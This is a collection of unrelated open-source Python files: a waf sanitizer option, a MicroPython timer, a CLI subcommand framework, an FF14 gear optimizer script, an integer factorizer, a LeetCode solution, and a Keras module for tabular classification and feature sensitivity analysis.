metadata (dict) | text (string, 60 to 3.49M characters) |
---|---|
{
"source": "7th-ndn-hackathon/Buffer-Interest_cxx",
"score": 2
} |
#### File: Buffer-Interest_cxx/.waf-tools/sanitizers.py
```python
def options(opt):
opt.add_option('--with-sanitizer', action='store', default='', dest='sanitizers',
help='Comma-separated list of compiler sanitizers to enable [default=none]')
def configure(conf):
for san in conf.options.sanitizers.split(','):
if not san:
continue
sanflag = '-fsanitize=%s' % san
conf.start_msg('Checking if compiler supports %s' % sanflag)
if conf.check_cxx(cxxflags=['-Werror', sanflag, '-fno-omit-frame-pointer'],
linkflags=[sanflag], mandatory=False):
conf.end_msg('yes')
conf.env.append_unique('CXXFLAGS', [sanflag, '-fno-omit-frame-pointer'])
conf.env.append_unique('LINKFLAGS', [sanflag])
else:
conf.end_msg('no', color='RED')
conf.fatal('%s sanitizer is not supported by the current compiler' % san)
``` |
{
"source": "7thTool/XMixly",
"score": 3
} |
#### File: common/lib/blynktimer.py
```python
try:
import utime as time
import uselect as select
except ImportError:
import time
import select
WAIT_SEC = 0.05
MAX_TIMERS = 16
DEFAULT_INTERVAL = 10
class TimerError(Exception):
pass
class Timer(object):
timers = {}
def __init__(self, no_timers_err=True):
self.no_timers_err = no_timers_err
def _get_func_name(self, obj):
if getattr(obj, '__name__', None) is None:
return self._get_func_name(obj.func)
return obj.__name__
def register(blynk, *args, interval=DEFAULT_INTERVAL, run_once=False, **kwargs):
class Deco(object):
def __init__(self, func):
self.func = func
if len(Timer.timers) >= MAX_TIMERS:
raise TimerError('Max allowed timers num={}'.format(MAX_TIMERS))
_timer = _Timer(interval, func, run_once, *args, **kwargs)
Timer.timers['{}_{}'.format(
len(Timer.timers), blynk._get_func_name(func))] = _timer
def __call__(self, *f_args, **f_kwargs):
return self.func(*f_args, **f_kwargs)
return Deco
@staticmethod
def stop(t_id):
timer = Timer.timers.get(t_id, None)
if timer is None:
raise TimerError('Timer id={} not found'.format(t_id))
Timer.timers[t_id].stopped = True
@staticmethod
def is_stopped(t_id):
timer = Timer.timers.get(t_id, None)
if timer is None:
raise TimerError('Timer id={} not found'.format(t_id))
return timer.stopped
def get_timers(self):
states = {True: 'Stopped', False: 'Running'}
return {k: states[v.stopped] for k, v in self.timers.items()}
def run(self):
        # select is used because time.sleep loads the CPU up to 100% with a small polling time
select.select([], [], [], WAIT_SEC)
timers_intervals = [curr_timer.run() for curr_timer in Timer.timers.values() if not curr_timer.stopped]
if not timers_intervals and self.no_timers_err:
raise TimerError('Running timers not found')
return timers_intervals
class _Timer(object):
def __init__(self, interval, deco, run_once, *args, **kwargs):
self.interval = interval
self.deco = deco
self.args = args
self.run_once = run_once
self.kwargs = kwargs
self.fire_time = None
self.fire_time_prev = None
self.stopped = False
def run(self):
timer_real_interval = 0
if self.fire_time is None:
self.fire_time = time.time() + self.interval
if self.fire_time_prev is None:
self.fire_time_prev = time.time()
curr_time = time.time()
if curr_time >= self.fire_time:
self.deco(*self.args, **self.kwargs)
if self.run_once:
self.stopped = True
timer_real_interval = curr_time - self.fire_time_prev
self.fire_time_prev = self.fire_time
self.fire_time = curr_time + self.interval
return timer_real_interval
``` |
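A minimal usage sketch for the `Timer` decorator above; the function name and the two-second interval are illustrative, and the `while` loop mirrors the polling pattern that `Timer.run()` is written for.
```python
timer = Timer()

@timer.register(interval=2)
def say_hello():
    print('hello')

while True:
    # fires any due timers and returns their measured real intervals
    intervals = timer.run()
```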
{
"source": "7tupel/subcommander",
"score": 3
} |
#### File: subcommander/subcommander/subcommander.py
```python
import argparse
import sys
from .command import Command
class DuplicateCommandError(Exception):
"""Error if duplicate commands are detected
"""
def __init__(self, message, key):
"""
"""
super(DuplicateCommandError, self).__init__(message)
self.key = key
def build_command_dict(default, extensions):
    """merge the default commands and extended commands
    :param [Command] default: list with default command classes
    :param [Command] extensions: list with extended command classes
    :raises DuplicateCommandError: if any command key is duplicated
    :returns: dictionary with commands in the form 'command-key': CommandClass
    """
    command_dict = {}
    # add default commands, checking for duplicate command keys
    # (a plain dict assignment never raises KeyError, so duplicates must be checked explicitly)
    for command in default:
        if command.command in command_dict:
            raise DuplicateCommandError('Duplicate Key detected', command.command)
        command_dict[command.command] = command
    # add additional commands and check for duplicates against the defaults
    for command in extensions:
        if command in default or command.command in command_dict:
            raise DuplicateCommandError('Duplicate Key detected', command.command)
        command_dict[command.command] = command
    return command_dict
class ArgumentParser(object):
"""Parse commandline arguments utilizing an inner argparse.ArgumentParser object
"""
def __init__(self, subcommander):
"""create the inner ArgumentParser and setup the help text
:param Subcommander subcommander: the outer Subcommander to get all available commands
"""
# inner argumentparser
self._subparser = argparse.ArgumentParser()
        # prepare help text for the available subcommands
positional_args = ''
for cmd_key, cmd_obj in subcommander._commands.items():
positional_args = positional_args + ' {} {}\n'.format(
cmd_obj.command, cmd_obj.description)
# build usage text
self._usage = (
'{} ({})\n'
'\n'
'usage: {} [-h] <command> [<args>] \n'
'\n'
'positional arguments:\n'
'{}'
'\n'
'optional arguments:\n'
' -h, --help show this help message and exit'
'').format(subcommander._name, subcommander._version, subcommander._cmd, positional_args)
        # overwrite the inner argumentparser help method to print the custom usage built above
setattr(self._subparser, 'format_help', lambda: print(self._usage))
def add_argument(self, *args, **kwargs):
"""wrapper to forward to inner ArgumentParser add_argument method
"""
return self._subparser.add_argument(*args, **kwargs)
def parse_args(self, *args, **kwargs):
"""wrapper to forward to inner ArgumentParser parse_args method
"""
return self._subparser.parse_args(*args, **kwargs)
def print_help(self):
"""print usage
"""
print(self._usage)
class Subcommander(object):
"""Subcommander class that takes a list of subcommands to execute
:param [Command] _default_commands: a list of default commands. used if further subclassing is necessary
:param str _name: the name of the application
:param str _cmd: the command used to execute the app from the commandline
:param str _version: version of the application
"""
_default_commands = []
_name = 'Subcommander'
_cmd = 'subcmd'
_version = '1.0'
def __init__(self, extensions=None):
"""setup the argument dispatching and add extended commands if provided
:param [Command] extensions: a list of optional Commands
"""
# merge default commands and custom app commands
if extensions is not None:
try:
self._commands = build_command_dict(self.__class__._default_commands, extensions)
except DuplicateCommandError as err:
                print('Command Error! '
                      'Command duplication detected! Could not initialize custom commands. '
                      'Command \'{}\' already exists!'.format(err.key))
exit(1)
else:
self._commands = build_command_dict(self.__class__._default_commands, [])
# dispatch commands
parser = ArgumentParser(self)
parser.add_argument('command', help='the command to run')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
arguments = parser.parse_args(sys.argv[1:2])
        if arguments.command not in self._commands:
print('Unrecognized command')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
self._commands[arguments.command]()(sys.argv[2:])
``` |
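A hypothetical wiring sketch for the classes above. The `Command` interface is only inferred from how `Subcommander` uses it (class attributes `command` and `description`, instances callable with the remaining argv), so the subclass below is an assumption, not the package's documented API.
```python
class HelloCommand(Command):
    command = 'hello'
    description = 'print a greeting'

    def __call__(self, argv):
        print('hello', *argv)


class MyTool(Subcommander):
    _default_commands = [HelloCommand]
    _name = 'MyTool'
    _cmd = 'mytool'
    _version = '0.1'


if __name__ == '__main__':
    MyTool()  # e.g. `mytool hello world` would dispatch to HelloCommand
```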
{
"source": "7tuv/ff14-materia-opt",
"score": 2
} |
#### File: ff14-materia-opt/src/main.py
```python
import sys
from calc_damage import MateriaOpt
from dataset import *
# equips = ["arm", "head", "body", "hands", "waist", "legs", "feet",
# "earrings", "necklace", "bracelets", "ring1", "ring2"]
def get_selected_dataset(dataset, choice_eq):
rtn = {}
for i in zip(dataset.keys(), choice_eq):
rtn[i[0]] = (dataset[i[0]][i[1]],)
return rtn
if __name__ == "__main__":
dataset = get_dataset_brd_il600()
# dataset = get_dataset_brd_il530()
# dataset = get_dataset_whm_il530()
# dataset = get_dataset_brd_il510()
    # choice_eq = [0, 1, 0, 0, 0, 1, 1,  # 6.0
    #              0, 1, 1, 0, 0]  # BRD best-in-slot gear (calculated) https://etro.gg/gearset/865fc886-994f-4c28-8fc1-4379f160a916
# dataset = get_selected_dataset(dataset, choice_eq)
    ### Setup ###
obj = MateriaOpt(dataset)
obj.set_rate_dmgsrc(aa=0.1259, dot=0.1272, ss=0.4175) # BRD
    #### GCD constraints #### http://allaganstudies.akhmorning.com/stats/speed/
    # obj.set_ss_condition(26)    # Constraint: GCD of at most 2.49
    # obj.set_ss_condition(127)   # Constraint: GCD of at most 2.48
    # obj.set_ss_condition(432)   # Constraint: GCD of at most 2.45
    # obj.set_ss_condition(534)   # Constraint: GCD of at most 2.44
    # obj.set_ss_condition(635)   # Constraint: GCD of at most 2.43
    # obj.set_ss_condition(737)   # Constraint: GCD of at most 2.42
    # obj.set_ss_condition(838)   # Constraint: GCD of at most 2.41
    # obj.set_ss_condition(940)   # Constraint: GCD of at most 2.40
    # obj.set_ss_condition(1041)  # Constraint: GCD of at most 2.39
    # obj.set_ss_condition(1143)  # Constraint: GCD of at most 2.39
    # obj.set_ss_condition(1244)  # Constraint: GCD of at most 2.38
    #### Piety constraints ####
    # obj.set_pi_condition(462)   # Constraint: Piety of at least X
    # obj.set_pi_condition(1000)  # Constraint: Piety of at least X
    #### Compute the optimum including food ####
    obj.set_meshi(ch=90, ss=54)  # 6.0 Pumpkin Ratatouille HQ ◎
    # obj.set_meshi(ch=54, dt=90)    # 6.0 Pumpkin Potage HQ
    # obj.set_meshi(ch=108, dt=179)  # 5.4 Smoked Chicken HQ
    # obj.set_meshi(ch=179, ss=108)  # 5.4 Chicken Fettuccine HQ
    # obj.set_meshi(dt=108, dh=179)  # 5.4 Pizza HQ
    # obj.set_meshi(ch=101, dt=168)  # 5.2 Highland-style stuffed cabbage roll HQ
obj.set_calcset(version="6.0")
# obj.set_calcset(version="5.5")
    #### Solve the optimization problem ####
obj.calc_damage()
``` |
{
"source": "7u83/IntFac",
"score": 3
} |
#### File: 7u83/IntFac/factorize.py
```python
import sys
def getbit(i, n):
return (i >> n) & 1
def setbit(i, n, val=1):
if val == 1:
return i | (1 << n)
return i & (~(1 << n))
def bitcmp(i1, i2, n):
for i in range(0, n):
b2 = getbit(i2, i)
b1 = getbit(i1, i)
if b1 != b2:
return b1 - b2
return 0
def fac_check(i, i1, i2, bits):
p = i1 * i2
if p > i:
return -3
if p == i:
if i1 == 1 or i2 == 1:
return -4
return 10
return bitcmp(i, p, bits)
def factorize_run(i, i1, i2, n):
for b in range(0, 4):
i1 = setbit(i1, n, getbit(b, 0))
i2 = setbit(i2, n, getbit(b, 1))
rc = fac_check(i, i1, i2, n + 1)
if rc == 10:
return factorize(i1) + factorize(i2)
if rc == 0:
f = factorize_run(i, i1, i2, n + 1)
if f != [i]:
return f
return [i]
def factorize(i):
l = factorize_run(i, 0, 0, 0)
l.sort()
return l
fpr = int(sys.argv[1])
print("Factorizing " + str(fpr) + " ...")
rc = factorize(fpr)
print(rc)
``` |
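A quick invocation sketch; the expected output follows from the recursion in `factorize`, which keeps splitting composites until only primes remain.
```python
# Example run:
#   $ python factorize.py 20
#   Factorizing 20 ...
#   [2, 2, 5]
```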
{
"source": "7u/leetcode",
"score": 3
} |
#### File: leetcode/medium/arithmeticSlices.py
```python
def numberOfArithmeticSlices(A):
"""
:type A: List[int]
:rtype: int
"""
n = len(A)
if n < 3:
return 0
    total = 0
    sliceLen = 2
    diff = A[1] - A[0]
    for i in range(2, n):
        newDiff = A[i] - A[i - 1]
        if diff == newDiff:
            sliceLen += 1
        else:
            if sliceLen >= 3:
                # a run of length L contributes L*(L-3)//2 + 1 = (L-1)*(L-2)//2 slices
                total += sliceLen * (sliceLen - 3) // 2 + 1
            sliceLen = 2
            diff = newDiff
    if sliceLen >= 3:
        total += sliceLen * (sliceLen - 3) // 2 + 1
    return total
``` |
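A few hand-checkable cases for the function above: `[1, 2, 3, 4]` contains the slices `[1,2,3]`, `[2,3,4]` and `[1,2,3,4]`, and a single arithmetic run of length L contributes (L-1)(L-2)/2 slices.
```python
assert numberOfArithmeticSlices([1, 2, 3, 4]) == 3
assert numberOfArithmeticSlices([1, 3, 5, 7, 9]) == 6   # one run of length 5
assert numberOfArithmeticSlices([7, 7, 7]) == 1
assert numberOfArithmeticSlices([1, 2, 4]) == 0
```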
{
"source": "7up4/amcl",
"score": 2
} |
#### File: package/model/neural_networks.py
```python
import os
import tensorflow as tf
import matplotlib.pyplot as plt
import random
import pandas as pd
import numpy as np
import keras.initializers
import keras.optimizers
from networkx import Graph, find_cliques
from sklearn.metrics import roc_curve, auc
from keras.layers import Concatenate, Input, Embedding, Lambda, Activation, BatchNormalization
from keras.layers.core import Dense, Dropout, Reshape
from keras.models import load_model, model_from_json, model_from_yaml, Model
from keras.utils.vis_utils import plot_model
from keras.callbacks import TensorBoard
from .datasets import DataSet
from .importing_modules import *
class NeuralNetworkConfig:
def __init__(self, categorical_input: str="cat_input", continuous_input: str="cont_input", output: str="output",
reshaped_output: str="reshaped_output", noisy_layer: str="noisy", kernel_initializer: str="uniform",
hidden: str = "hidden", reshaped: str="reshaped", dropout: str="dropout", merge: str="merge",
activation: str="relu", output_activation: str="sigmoid", batch_normalization: bool=False):
self.kernel_initializer = kernel_initializer
self.activation = activation
self.output_activation = output_activation
self.cont_input = continuous_input
self.cat_input = categorical_input
self.hidden = hidden
self.noisy_layer = noisy_layer
self.reshaped = reshaped
self.merge = merge
self.dropout = dropout
self.output = output
self.reshaped_output = reshaped_output
self.batch_normalization = batch_normalization
class NeuralNetwork:
def __init__(self, model):
self.__model = model
def get_model(self):
return self.__model
@classmethod
def from_file(cls, from_file: str):
model = load_model(from_file)
return cls(model)
def get_layer(self, name):
return self.__model.get_layer(name)
def get_weights(self):
return self.__model.get_weights()
def set_weights(self, weights):
self.__model.set_weights(weights)
def get_weights_for_layer(self, feature):
return self.__model.get_layer(feature).get_weights()
def get_weights_with_name(self):
model = self.__model
names = [layer.name for layer in model.layers]
weights = []
for name in names:
weights.append(model.get_layer(name).get_weights())
return dict(zip(names, weights))
def set_weights_by_name(self, weights):
for name, weight in weights.items():
self.__model.get_layer(name).set_weights(weight)
def save_plot(self, to_file='model_plot.svg', shapes=False, layer_names=False):
if to_file:
plot_model(self.__model, to_file=to_file, show_shapes=shapes, show_layer_names=layer_names)
def compile(self, loss='binary_crossentropy', lr=0.001):
optimizer=keras.optimizers.Adam(lr=lr)
self.__model.compile(loss=loss, optimizer=optimizer, metrics=['accuracy'])
def export(self, to_file):
if to_file:
name, ext = os.path.splitext(to_file)
if ext == '.h5':
self.__model.save(to_file)
            elif ext == '.json':
                model_json = self.__model.to_json()
                with open(to_file, 'w') as json_file:
                    json_file.write(model_json)
            elif ext == '.yaml':
                model_yaml = self.__model.to_yaml()
                with open(to_file, 'w') as yaml_file:
                    yaml_file.write(model_yaml)
class DenseNeuralNetwork(NeuralNetwork):
@classmethod
def from_scratch(cls, config: NeuralNetworkConfig, dataset, hidden_units: int,
embedding_size: int = 10, dropout_rate: float = 0.0,
output_units=1, embedding_layers_trainable=True):
categorical_data = dataset.get_data(without_resulting_feature=True).select_dtypes(include='category')
continuous_features = dataset.get_data(without_resulting_feature=True).select_dtypes(
exclude='category').columns.size
if isinstance(categorical_data, pd.DataFrame):
categorical_data_categories = {}
for column in categorical_data:
categorical_data_categories[column] = categorical_data[column].cat.categories.size
categorical_data = categorical_data_categories
model = DenseNeuralNetwork._build(config, categorical_data, continuous_features, hidden_units, embedding_size,
dropout_rate, output_units, embedding_layers_trainable)
return cls(model)
@staticmethod
def _build(config, categorical_data_categories, continuous_features: int, hidden_units: int, embedding_size: int,
dropout_rate, output_units: int, embedding_layers_trainable):
# create input layer for continuous data
continuous_input = Input(shape=(continuous_features,), name=config.cont_input)
reshaped_continuous_input = Reshape((1, continuous_features),
name=config.reshaped)(continuous_input)
# create input layers complemented by embedding layers to handle categorical features
embedding_layers = []
categorical_inputs = []
for feature, size in categorical_data_categories.items():
categorical_input = Input((1,), name=config.cat_input + "_" + feature)
categorical_inputs.append(categorical_input)
embedding_layer = Embedding(size, embedding_size, name=feature, trainable=embedding_layers_trainable)(
categorical_input)
embedding_layers.append(embedding_layer)
# merge all inputs
merge_layer = Concatenate(name=config.merge)(embedding_layers + [reshaped_continuous_input])
# hidden layers
hidden_layer = Dense(hidden_units, kernel_initializer=config.kernel_initializer,
name=config.hidden)(merge_layer)
if config.batch_normalization:
hidden_layer = BatchNormalization()(hidden_layer)
hidden_layer = Activation(config.activation)(hidden_layer)
dropout_layer = Dropout(dropout_rate, name=config.dropout)(hidden_layer)
# output_layer
output_layer = Dense(output_units, name=config.output)(dropout_layer)
output_layer = Activation(config.output_activation)(output_layer)
# add reshape layer since output should be vector
output_layer = Reshape((1,), name=config.reshaped_output)(output_layer)
# create final model
model = Model(inputs=categorical_inputs + [continuous_input], outputs=output_layer)
return model
class OptimizedNeuralNetwork(NeuralNetwork):
@classmethod
def from_scratch(cls, config: NeuralNetworkConfig, dataset: DataSet, correlation_info: list, embedding_size: int=10,
dropout_rate: float=0.0, output_units=1):
flatten_correlation = [item for sublist in correlation_info for item in sublist]
features = dataset.get_data(without_resulting_feature=True).columns
if not all(elem in features for elem in flatten_correlation):
return None
diff = list(set(features) - set(flatten_correlation))
diff = [[item] for item in diff]
correlation_info.extend(diff)
categorical_data = dataset.get_data(without_resulting_feature=True).select_dtypes(include='category')
continuous_features = dataset.get_data(without_resulting_feature=True).select_dtypes(exclude='category').columns
if isinstance(categorical_data, pd.DataFrame):
categorical_data_categories = {}
for column in categorical_data:
categorical_data_categories[column] = categorical_data[column].cat.categories.size
categorical_data = categorical_data_categories
model = OptimizedNeuralNetwork._build(config, categorical_data, continuous_features, correlation_info,
embedding_size, dropout_rate, output_units)
return cls(model)
@staticmethod
def _build(config: NeuralNetworkConfig, categorical_data_categories: dict, continuous_features: list,
correlation_info: list,embedding_size: int, dropout_rate: float, output_units: int):
feature_layers = {}
hidden_layers = []
inputs = []
for feature, size in categorical_data_categories.items():
categorical_input = Input((1,), name=config.cat_input + "_" + feature)
inputs.append(categorical_input)
embedding_layer = Embedding(size, embedding_size, name=feature)(categorical_input)
feature_layers[feature] = embedding_layer
for feature in continuous_features:
continuous_input = Input((1,), name=config.cont_input + "_" + feature)
inputs.append(continuous_input)
reshaped_continuous_input = Reshape((1, 1), name=feature)(continuous_input)
feature_layers[feature] = reshaped_continuous_input
for couple in correlation_info:
coupled_layers = [feature_layers[feature] for feature in couple]
if len(couple) > 1:
merge_layer = Concatenate()(coupled_layers)
hidden_layer = Dense(1, kernel_initializer=config.kernel_initializer)(merge_layer)
if config.batch_normalization:
hidden_layer = BatchNormalization()(hidden_layer)
hidden_layer = Activation(config.activation)(hidden_layer)
else:
hidden_layer = Dense(1, kernel_initializer=config.kernel_initializer)(coupled_layers[0])
if config.batch_normalization:
hidden_layer = BatchNormalization()(hidden_layer)
hidden_layer = Activation(config.activation)(hidden_layer)
hidden_layers.append(hidden_layer)
merge_layer = Concatenate()(hidden_layers)
dropout_layer = Dropout(dropout_rate, name=config.dropout)(merge_layer)
# output_layer
output_layer = Dense(1, name=config.output)(dropout_layer)
output_layer = Activation(config.output_activation)(output_layer)
# add reshape layer since output should be vector
output_layer = Reshape((output_units,), name=config.reshaped_output)(output_layer)
# create final model
model = Model(inputs=inputs, outputs=output_layer)
return model
class Trainer:
def __init__(self, nnet: NeuralNetwork, training_dataset, training_target, batch_size=32, epochs=1000):
self.__nnet = nnet
self.__training_dataset = training_dataset
self.__training_target = training_target
self.__batch_size = batch_size
self.__epochs = epochs
self.__score = None
self._preprocess_dataset()
def _preprocess_dataset(self):
categorical_data = DataSet.dataframe_to_series(self.__training_dataset.get_data(without_resulting_feature=True).select_dtypes(include='category'))
if isinstance(self.__nnet, OptimizedNeuralNetwork):
continuous_data = DataSet.dataframe_to_series(self.__training_dataset.get_data(without_resulting_feature=True).select_dtypes(exclude='category'))
self.__training_dataset = [*categorical_data, *continuous_data]
else:
continuous_data = self.__training_dataset.get_data().select_dtypes(exclude='category').values
self.__training_dataset = [*categorical_data, continuous_data]
def train(self, verbose=1):
tensorboard = TensorBoard(log_dir="./logs")
self.__nnet.get_model().fit(self.__training_dataset, self.__training_target, batch_size=self.__batch_size,
epochs=self.__epochs, verbose=verbose, shuffle=False, callbacks=[tensorboard])
def evaluate(self, verbose=1):
self.__score = self.__nnet.get_model().evaluate(self.__training_dataset, self.__training_target,
batch_size=self.__batch_size, verbose=verbose)
def get_score(self):
return self.__score
class Predictor:
def __init__(self, nnet: NeuralNetwork, dataset: DataSet):
self._nnet = nnet
self._dataset = dataset
self._score = {}
self._prediction = []
self._preprocess()
def _preprocess(self):
categorical_data = DataSet.dataframe_to_series(self._dataset.get_data().select_dtypes(include='category'))
if isinstance(self._nnet, OptimizedNeuralNetwork):
continuous_data = DataSet.dataframe_to_series(self._dataset.get_data().select_dtypes(exclude='category'))
self._dataset = [*categorical_data, *continuous_data]
else:
continuous_data = self._dataset.get_data().select_dtypes(exclude='category').values
self._dataset = [*categorical_data, continuous_data]
def predict(self):
self._prediction = self._nnet.get_model().predict(self._dataset).flatten()
return self._prediction
def evaluate(self, real_values, show_plot: bool = False):
if len(self._prediction) > 0:
rounded_pred = np.round(self._prediction)
tp = np.sum(np.logical_and(rounded_pred == 1, real_values == 1))
tn = np.sum(np.logical_and(rounded_pred == 0, real_values == 0))
fp = np.sum(np.logical_and(rounded_pred == 1, real_values == 0))
fn = np.sum(np.logical_and(rounded_pred == 0, real_values == 1))
accuracy = (tp + tn) / (tp + fp + fn + tn)
self._score['ppv'] = tp / (tp + fp)
self._score['npv'] = tn / (tn + fn)
self._score['recall'] = tp / (tp + fn)
self._score['specificity'] = tn / (tn + fp)
self._score['accuracy'] = accuracy
self._score['tp'] = tp
self._score['tn'] = tn
self._score['fp'] = fp
self._score['fn'] = fn
if show_plot:
self._roc(real_values, np.unique(real_values).size)
def _roc(self, real_values, n_classes):
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(real_values, self._prediction)
roc_auc[i] = auc(fpr[i], tpr[i])
plt.figure()
lw = 1
plt.plot(fpr[1], tpr[1], color='darkorange',
lw=lw, label='AUC = %0.2f' % roc_auc[1])
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.0])
        plt.xlabel('False positive rate')
        plt.ylabel('True positive rate')
        plt.title('ROC curve')
plt.legend(loc="lower right")
plt.show()
def get_score(self):
return self._score
def get_prediction(self):
return self._prediction
class FeatureSelector:
def __init__(self, config: NeuralNetworkConfig, nnet: DenseNeuralNetwork, training_dataset):
self._source_model = nnet
self._config = config
self._training_dataset = training_dataset
categorical_columns = training_dataset.get_data(without_resulting_feature=True).select_dtypes(include='category').columns
self._weights = self._source_model.get_weights_with_name()
self._cat_input_shape = self._source_model.get_layer(config.cat_input + "_" + categorical_columns[0]).get_input_shape_at(0)
self._cont_input_shape = self._source_model.get_layer(config.cont_input).get_input_shape_at(0)[-1]
self._hid_size = self._source_model.get_layer(config.hidden).get_output_shape_at(0)[-1]
self._emb_size = self._source_model.get_layer(categorical_columns[0]).get_output_shape_at(0)[-1]
self._dropout_rate = self._source_model.get_layer(config.dropout).get_config()['rate']
self._cat_data = {}
for x in categorical_columns:
self._cat_data[x] = self._source_model.get_layer(x).get_config()["input_dim"] - 1
def _build_network(self, config, dataset, full_copy: bool = False):
noisy_model = DenseNeuralNetwork.from_scratch(config=config, dataset=dataset,
hidden_units=self._hid_size, embedding_size=self._emb_size,
dropout_rate=self._dropout_rate,embedding_layers_trainable=False)
return noisy_model
def run(self, training_dataset, training_target, test_dataset, test_target, noise_rate=0.01, training_epochs=100, batch_size=8, lr=0.001):
training_dataset = DataSet.copy(training_dataset)
test_dataset = DataSet.copy(test_dataset)
predictor = Predictor(self._source_model, test_dataset)
prediction = predictor.predict()
predictor.evaluate(test_target)
prev_accuracy = predictor.get_score()['accuracy']
curr_accuracy = predictor.get_score()['accuracy']
features_to_remove = []
# noise_rate = random.uniform(0, noise_rate)
while curr_accuracy >= prev_accuracy:
for column in training_dataset.get_data().columns:
if test_dataset.get_data()[column].dtype.name == 'category':
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_categorical_columns(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, noisy_dataset)
else:
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_column(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, noisy_dataset)
noisy_prediction = predictor.predict()
sensitivity = abs(np.sum(noisy_prediction) - np.sum(prediction)) / len(noisy_prediction)
test_dataset.get_features().set_sensitivity(column, sensitivity)
training_dataset.get_features().set_sensitivity(column, sensitivity)
print("Sensitivity of %s: %f" % (column, training_dataset.get_features().get_sensitivity(column)))
less_sensitive_feature = test_dataset.get_features().get_less_sensitive_feature()
features_to_remove.append(less_sensitive_feature)
test_dataset.rm_less_sensitive()
training_dataset.rm_less_sensitive()
emb_weights = {feature: self._weights[feature] for feature in training_dataset.get_data().select_dtypes(include='category').columns.tolist()}
self._source_model = self._build_network(self._config, training_dataset)
self._source_model.compile(lr=lr)
self._source_model.set_weights_by_name(emb_weights)
trainer = Trainer(self._source_model, training_dataset, training_target, epochs=training_epochs, batch_size=batch_size)
trainer.train()
trainer.evaluate()
self._weights = self._source_model.get_weights_with_name()
predictor = Predictor(self._source_model, test_dataset)
prediction = predictor.predict()
predictor.evaluate(test_target)
prev_accuracy, curr_accuracy = curr_accuracy, predictor.get_score()['accuracy']
print(prev_accuracy)
print(curr_accuracy)
return features_to_remove[:-1]
class CorrelationAnalyzer:
def __init__(self, config: NeuralNetworkConfig, nnet: DenseNeuralNetwork, training_dataset):
self._source_model = nnet
self._config = config
self._training_dataset = training_dataset
self._columns = self._training_dataset.get_data().columns
categorical_columns = training_dataset.get_data(without_resulting_feature=True).select_dtypes(
include='category').columns
self._weights = None
self._emb_weights = None
self._cat_input_shape = self._source_model.get_layer(config.cat_input + "_" + categorical_columns[0]).get_input_shape_at(0)
self._cont_input_shape = self._source_model.get_layer(config.cont_input).get_input_shape_at(0)[-1]
self._hid_size = self._source_model.get_layer(config.hidden).get_output_shape_at(0)[-1]
self._emb_size = self._source_model.get_layer(categorical_columns[0]).get_output_shape_at(0)[-1]
self._dropout_rate = self._source_model.get_layer(config.dropout).get_config()['rate']
self._table = np.empty([len(categorical_columns)+self._cont_input_shape+1, len(categorical_columns)+self._cont_input_shape+1])
self._cat_data = {}
for x in categorical_columns:
self._cat_data[x] = self._source_model.get_layer(x).get_config()["input_dim"] - 1
def _build_network(self, config, dataset, full_copy: bool = False):
noisy_model = DenseNeuralNetwork.from_scratch(config=config, dataset=dataset,
hidden_units=self._hid_size, embedding_size=self._emb_size,
dropout_rate=self._dropout_rate,embedding_layers_trainable=False)
if not full_copy:
noisy_model.set_weights_by_name(self._emb_weights)
else:
noisy_model.set_weights_by_name(self._weights)
return noisy_model
def run(self, test_dataset, training_dataset, training_target, noise_rate=0.01, training_epochs=100, batch_size=32, lr=0.03):
training_dataset = DataSet.copy(training_dataset)
trainer = Trainer(self._source_model, training_dataset, training_target, epochs=training_epochs)
trainer.train()
trainer.evaluate()
self._weights = self._source_model.get_weights_with_name()
self._emb_weights = {feature: self._weights[feature] for feature in list(self._cat_data.keys())}
predictor = Predictor(self._source_model, test_dataset)
self._table[0][0] = np.sum(predictor.predict())
# noise_rate = random.uniform(0, noise_rate)
for idx, column in enumerate(self._columns):
if training_dataset.get_data()[column].dtype.name == 'category':
noisy_dataset = DataSet.copy(training_dataset)
noisy_dataset.add_noise_to_categorical_columns(column, noise_rate)
noisy_model = self._build_network(self._config, training_dataset)
noisy_model.compile(lr=lr)
trainer = Trainer(noisy_model, noisy_dataset, training_target, epochs=training_epochs, batch_size=batch_size)
trainer.train()
trainer.evaluate()
predictor = Predictor(noisy_model, test_dataset)
else:
noisy_dataset = DataSet.copy(training_dataset)
noisy_dataset.add_noise_to_column(column, noise_rate)
noisy_model = self._build_network(self._config, training_dataset)
noisy_model.compile(lr=lr)
trainer = Trainer(noisy_model,noisy_dataset, training_target, epochs=training_epochs, batch_size=batch_size)
trainer.train()
trainer.evaluate()
predictor = Predictor(noisy_model, test_dataset)
noisy_prediction = predictor.predict()
self._table[0][idx+1] = abs(np.sum(noisy_prediction) - self._table[0][0]) / len(noisy_prediction)
for idx, column in enumerate(self._columns):
if test_dataset.get_data()[column].dtype.name == 'category':
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_categorical_columns(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, test_dataset)
else:
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_column(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, noisy_dataset)
noisy_prediction = predictor.predict()
self._table[idx + 1][0] = abs(np.sum(noisy_prediction) - self._table[0][0]) / len(noisy_prediction)
for c in range(len(self._cat_data)+self._cont_input_shape):
for idx in range(len(self._cat_data)+self._cont_input_shape):
self._table[idx+1][c+1] = abs(self._table[idx+1][0] - self._table[0][c+1])
self._table = np.delete(self._table, 0, 0)
self._table = np.delete(self._table, 0, 1)
self._table = pd.DataFrame(data=self._table, index=self._columns, columns=self._columns)
self._table.loc['mean'] = self._table.mean()
return self._table
def select_candidates(self):
candidates = pd.DataFrame(columns=self._columns)
fcandidates = []
for column in self._table:
candidates[column] = pd.Series((self._table.loc[self._table[column] > self._table[column]['mean']]).index)
for column in candidates:
for row in range(candidates.shape[0]):
if candidates[column][row] == candidates[column][row] and candidates[column][row] != column:
if column in candidates[candidates[column][row]].tolist():
fcandidates.append([column, candidates[column][row]])
[l.sort() for l in fcandidates]
